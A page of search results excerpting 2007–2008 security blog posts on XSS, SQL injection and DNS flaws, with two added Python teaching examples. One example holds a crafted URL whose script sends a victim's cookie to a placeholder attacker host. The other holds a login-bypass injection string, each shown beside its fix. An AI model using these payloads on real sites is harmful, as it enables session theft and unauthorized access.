SEARCH RESULTS
 
Showing 1-10 of 29 records
 
Automating web application security testing

2007-07-16 11:40:00 by Panayiotis Mavrommatis in Google Online Security Blog
 
...query parameters is vulnerable to reflected XSS. With a vulnerable application, an attacker can craft a malicious URL and send it to the victim via email or any other mode of communication. When the victim visits the tampered link, the page is loaded along with the injected script that is executed in the context of the victim's session. The...
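The reflected-XSS pattern in the excerpt above, as an added example that is not code from the Google post: a hypothetical search page that echoes its q parameter into the response, the same page with the parameter HTML-escaped for the text context it lands in, and a minimal automated probe of the kind the article's title refers to. The endpoint functions, the example.test and attacker.test hosts, the probe string and the malicious URL are all constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Hypothetical search endpoints for illustration; not from the article.
# Both read the user-supplied ?q= parameter and put it into the response body.


def _query_param(url: str, name: str = "q") -> str:
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(url: str) -> str:
    """Reflects ?q= into an HTML text context verbatim: the reflected-XSS flaw."""
    return f"<html><body><p>Results for: {_query_param(url)}</p></body></html>"


def render_search_fixed(url: str) -> str:
    """Same page, but the value is encoded for the HTML text context it lands in."""
    safe = html.escape(_query_param(url), quote=True)
    return f"<html><body><p>Results for: {safe}</p></body></html>"


# Constructed attacker URL: the script sends the victim's cookie to a host the
# attacker controls (attacker.test is a placeholder, not a real site).
MALICIOUS_URL = "https://example.test/search?" + urlencode(
    {"q": "<script>document.location='https://attacker.test/?c='+document.cookie</script>"}
)

# A probe containing the metacharacters a browser would act on; if it comes
# back byte-for-byte, the parameter is reflected without output encoding.
PROBE = '"><gprobe>'


def probe_reflected_xss(render, base_url: str, param: str = "q") -> bool:
    """Minimal automated check: inject PROBE into `param`, fetch the page via
    `render` (which stands in for an HTTP request here) and report whether the
    marker was echoed unchanged."""
    parts = urlsplit(base_url)
    url = urlunsplit(parts._replace(query=urlencode({param: PROBE})))
    return PROBE in render(url)


if __name__ == "__main__":
    for name, fn in [("vulnerable", render_search_vulnerable), ("fixed", render_search_fixed)]:
        echoed = probe_reflected_xss(fn, "https://example.test/search")
        print(f"{name}: parameter reflected unescaped = {echoed}")
```

html.escape is the right encoder only for the HTML text and attribute contexts used here; a value reflected inside a script block, a URL or an event handler needs the encoding for that context, and the probe above would need a marker tailored to that context to detect it.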
 
 
 
 
 
Streaming SQL Approaches Insist in Ignoring Causality by PatternStorm

2008-09-05 14:25:35 by Tim Bass in The Complex Event Processing Blog
 
...query that StreamBase cannot solve (but Oracle can) is the following: correlate the stream that contains the total number of cars on the road for each time interval with the stream that contains the total average speed of the cars on the road for each time interval in order to detect the situation where the average speed is below 45 and the...
 
 
 
 
 
New faces and predictions for the New Year...

2008-01-22 22:11:00 by sdl in The Security Development Lifecycle
 
...query of the NVD with "Vendor=Microsoft", "Start Date= January 2007", and "End Date=December 2007" returns 254 matches. A query of NVD without selecting any vendor, and choosing "Start Date= January 2007", and "End Date=December 2007" returns 6532 matches. If my math is correct, that states that Microsoft was responsible for 3.8885 percent of...
 
 
 
 
 
Oklahoma Department of Corrections SQL exposure

2008-04-21 11:23:45 by Evan Francen in The Breach Blog
 
...query as a parameter. Fortunately, he didn't accuse me of hacking their site. In fact, he seemed appreciative and promised to pass the details along to their developers. The following day, both the SVOR and Offender Search were taken down "for routine maintenance." However, when the sites came back up, I noticed that the "print-friendly...
 
 
 
 
 
Giving SQL Injection the Respect it Deserves

2008-05-15 18:45:00 by sdl in The Security Development Lifecycle
 
...query through the application. This vulnerability allows for unauthorized, interactive logon to a SQL server which may result in the execution of malicious commands leading to the possible modification (or deletion) of Operating System or user data. Combining the use of parameterized queries and stored procedures helps to mitigate the risk of...
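The parameterized-query mitigation named in the excerpt, as an added example that is not the SDL post's own code: a login lookup built by string concatenation beside the same lookup with bound parameters, run against constructed in-memory SQLite data. The table, columns, user names and crafted input are invented for the illustration; SQLite has no stored procedures, so that half of the recommendation is not shown.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample data for the illustration; not from the article."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-pw", "admin"), ("bob", "hash-of-bob-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password_hash: str):
    """Concatenates untrusted input into the statement text, so the input can
    change the query's structure rather than only the values it compares."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username: str, password_hash: str):
    """Binds the input as parameters: the SQL text is fixed at development time
    and the values reach the engine separately, so quotes and comment markers
    inside them are only characters to compare against."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()


# Crafted username: closes the string literal and comments out the rest of the
# WHERE clause, so the password check never runs in the concatenated version.
INJECTED_USERNAME = "alice' --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, INJECTED_USERNAME, "wrong"))
    print("parameterized:", login_parameterized(db, INJECTED_USERNAME, "wrong"))
```

The bound version is safe because the values never enter the SQL grammar. The same test applies to stored procedures: one whose body assembles dynamic SQL from its arguments by concatenation is injectable in exactly the way login_vulnerable is, so the mitigation the excerpt describes depends on how the procedure itself is written.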
 
 
 
 
 
Limitations in Scrawlr

2008-06-27 07:18:51 by Editor in Cheap Hack
 
One of the measures Microsoft recently took in reaction to a wave of SQL injection attacks was to point people to the crawling tool Scrawlr from HP. Now Mike Tracy of Matasano Security has a blog discussing some of the limitations in that tool and how to get around some of them. They refer to it as "... a cripple-ware SQL injection scanner"...
 
 
 
 
 
Massive Coordinated Patch Effort To DNS System Flaw

2008-07-08 17:56:25 by Editor in Cheap Hack
 
...query IDs VU#927905 - BIND version 8 generates cryptographically weak DNS query identifiers. The advisory lists 101 DNS servers, their status and the date of their last update. For the large majority of the servers the status is "Unknown," but several important ones are listed as Vulnerable and all of these were patched either today or late...
 
 
 
 
 